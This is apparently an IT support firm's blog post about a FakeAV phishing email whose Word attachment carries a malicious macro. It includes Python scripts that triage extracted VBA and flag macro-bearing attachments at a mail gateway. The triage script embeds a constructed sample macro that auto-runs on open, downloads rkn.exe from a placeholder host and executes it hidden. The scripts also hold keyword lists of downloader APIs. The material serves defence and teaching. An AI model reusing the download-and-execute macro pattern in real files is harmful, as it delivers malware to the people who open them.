Trojan.FakeAV has been around for quite a while; however, it is making another debut. This family of malware tries to convince a user to remove non-existent malware or security risks from their computer by installing bogus software.
Users are offered a link to the software through spam emails, spammed blogs/forums, malicious banner ads, pirated software, file-sharing networks, or even exploited web pages.
Once installed, a constant stream of pop-up warnings appears stating that a harmful virus has been detected and urging you to purchase software to clean it up.
Here is what we received via email:
We noted the following:
- The From address is from a domain outside the US (.it = Italy)
- The "?" at the beginning of the body
- No mention of a company name or logo
- No mention of what was "purchased"
- There have not been any purchases in the amount noted ($6,901) recently
- The attached .doc file with the supposed invoice. This is not how any vendor has sent this information in the past.
We also noticed the banner at the top of the message stating the following:
"If there are problems with how this message is displayed, click here to view in a web browser."
This banner suggested that the HTML in the body of the message was poorly coded, and viewing the source of the message verified it. No credible online vendor would send a message riddled with HTML errors.
The attached doc file was opened on a secured workstation to see the contents. A snip of the document is below:
The document instructs the reader to enable the embedded macro. You should NEVER enable macros in an Office document unless you completely understand its source and purpose.
I extracted the macros from the file to determine what they did and how the infection proceeds. The macro is designed to download a file called rkn.exe from a web host in Australia. That file, if executed, infects the machine with the Trojan.FakeAV!gen29 malware. This infection belongs to a family of "fake AV" malware that purports to be virus protection software: it produces pop-ups claiming that a virus has been found on the workstation and offering software to remove it. This "removal" comes at a price, and it does not remove the actual malware.
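The triage described above (pull the macro out, find the trigger, find what it downloads and runs) can be automated once the VBA source has been extracted, for example with olevba from the oletools project. The script below is an added example written for this post, not the macro from the message or River Run's own tooling: it takes VBA source text as input, looks for auto-execute entry points, download/execute API calls, URLs and dropped executable names, and gives a verdict. The SAMPLE_VBA blob is constructed for illustration; its host (example.invalid) and layout are hypothetical and only the rkn.exe file name comes from the post.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the style of the downloader described in the post.
# The URL, host and code layout are hypothetical placeholders, NOT the real
# macro from the message; only the dropped file name rkn.exe matches the post.
SAMPLE_VBA = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim dest As String
    dest = Environ("TEMP") & "\rkn.exe"
    URLDownloadToFile 0, "http://example.invalid/files/rkn.exe", dest, 0, 0
    Shell dest, vbHide
End Sub
'''

# Procedure names Office runs without user interaction (beyond "Enable Content").
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "Auto_Open",
            "Workbook_Open", "AutoClose", "Document_Close")
# APIs and objects commonly used to fetch and launch a payload.
SUSPICIOUS = ("URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "WScript.Shell",
              "CreateObject", "Shell", "Environ", "powershell")
DOWNLOADERS = ("URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "powershell")

URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
EXE_RE = re.compile(r'[\w.-]+\.(?:exe|scr|dll|bat|vbs|ps1)\b', re.IGNORECASE)


@dataclass
class MacroReport:
    autoexec: list = field(default_factory=list)
    suspicious: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    dropped_files: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        downloader = bool(self.urls) and any(k in self.suspicious for k in DOWNLOADERS)
        if self.autoexec and downloader:
            return "download-and-execute on open"
        if self.autoexec or self.suspicious:
            return "suspicious"
        return "no indicators"


def triage_vba(source: str) -> MacroReport:
    """Static triage of extracted VBA source: no execution, regex only."""
    report = MacroReport()
    for name in AUTOEXEC:
        # Match the procedure definition, not a mere mention in a comment.
        if re.search(rf'\bSub\s+{name}\b', source, re.IGNORECASE):
            report.autoexec.append(name)
    for kw in SUSPICIOUS:
        if re.search(rf'\b{re.escape(kw)}\b', source, re.IGNORECASE):
            report.suspicious.append(kw)
    report.urls = sorted(set(URL_RE.findall(source)))
    report.dropped_files = sorted({m.lower() for m in EXE_RE.findall(source)})
    return report


if __name__ == "__main__":
    r = triage_vba(SAMPLE_VBA)
    print("trigger   :", r.autoexec)
    print("APIs      :", r.suspicious)
    print("URLs      :", r.urls)
    print("drops     :", r.dropped_files)
    print("verdict   :", r.verdict)
```

Keyword matching like this is a first pass only: attackers routinely split strings (`"rk" & "n.exe"`) or build URLs with Chr() calls, so a macro that scores "suspicious" without a visible URL still deserves a manual read or deobfuscation before it is dismissed.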
What can you do if you receive a message like the example?
If you receive a message like the example, do not open the attachment. Let your IT support people know you received the message, delete it immediately, and clear it from your Deleted Items or recycle bin if asked to.
How can you prevent a message like this from reaching your inbox?
Unfortunately, desktop anti-virus programs may not be able to block this type of email: the example message passed through a spam/virus mail filter and was not caught by desktop antivirus either. The best method of blocking this type of infection through email is a gateway anti-virus and anti-spyware solution. The SonicWALL family of firewalls can be configured to block all Office attachments containing macros from entering the local network.
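To make the gateway rule concrete, here is an added example (written for this post, not SonicWALL's or River Run's code) of the check such a filter performs: parse the message, walk its attachments, and decide from the file contents, not the extension, whether an Office document carries a VBA project. OOXML files (.docm, .xlsm, and a .docm renamed to .doc) are zip containers that hold macros in a vbaProject.bin part; legacy binary .doc/.xls files are OLE2 compound files whose macro storage has UTF-16LE directory names such as _VBA_PROJECT, which the block detects with a byte-scan heuristic rather than a full OLE2 parser. The sample email, its sender address (example.it) and the attachment blobs are constructed in the block and are not the message from the post.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file (.doc/.xls/.ppt)
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML container (.docx/.docm/.xlsm)


def ole_has_macros(data: bytes) -> bool:
    """Heuristic for legacy binary Office files: the VBA project storage has
    directory entries named in UTF-16LE ('VBA', '_VBA_PROJECT'). A byte scan
    avoids a full OLE2 parser but is evadable; a production gateway should use
    a real parser (e.g. oletools) instead of this shortcut."""
    return any(m.encode("utf-16-le") in data for m in ("_VBA_PROJECT", "VBA"))


def ooxml_has_macros(data: bytes) -> bool:
    """OOXML stores macros in a vbaProject.bin part inside the zip."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def attachment_has_macros(filename: str, data: bytes) -> bool:
    """Decide by content: a renamed .docm still opens (and runs) in Word."""
    if data.startswith(OLE_MAGIC):
        return ole_has_macros(data)
    if data.startswith(ZIP_MAGIC):
        return ooxml_has_macros(data)
    return False


def scan_message(raw: bytes) -> list:
    """Return the names of attachments that are Office files carrying macros."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    flagged = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        if attachment_has_macros(name, payload):
            flagged.append(name)
    return flagged


# ---- constructed test data (not real documents or the real email) ----------
def build_ooxml(with_macros: bool) -> bytes:
    """Minimal zip shaped like an OOXML document; optionally with a VBA part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", b"\x01\x16\x03\x00placeholder-vba-blob")
    return buf.getvalue()


# Fake OLE2 header followed by a UTF-16LE directory-entry name, as a legacy
# .doc with a VBA project would contain.
SAMPLE_FAKE_OLE = OLE_MAGIC + b"\x00" * 504 + "_VBA_PROJECT".encode("utf-16-le")


def build_message(attachments) -> bytes:
    """Constructed 'invoice' email carrying the given (filename, bytes) pairs."""
    msg = EmailMessage()
    msg["From"] = "billing@example.it"        # hypothetical sender
    msg["To"] = "accounts@example.com"
    msg["Subject"] = "Invoice"
    msg.set_content("? Please see the attached invoice.")
    for name, data in attachments:
        msg.add_attachment(data, maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


SAMPLE_EMAIL = build_message([
    ("invoice.doc", build_ooxml(True)),    # .docm renamed to .doc
    ("notes.docx", build_ooxml(False)),    # macro-free document
    ("old.doc", SAMPLE_FAKE_OLE),          # legacy binary with VBA project
])

if __name__ == "__main__":
    print("blocked attachments:", scan_message(SAMPLE_EMAIL))
```

The important design choice is that the verdict never relies on the file name. Blocking "*.docm" alone would have let the example message through, since the attacker shipped a plain .doc; inspecting the container for a VBA project catches both the legacy and the renamed-OOXML cases.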
Contact River Run Computers immediately if you become aware of a virus on your computers. We will do our best to resolve the issues as quickly as possible. Click on this link for our Support Desk or call us directly at 414-228-5617.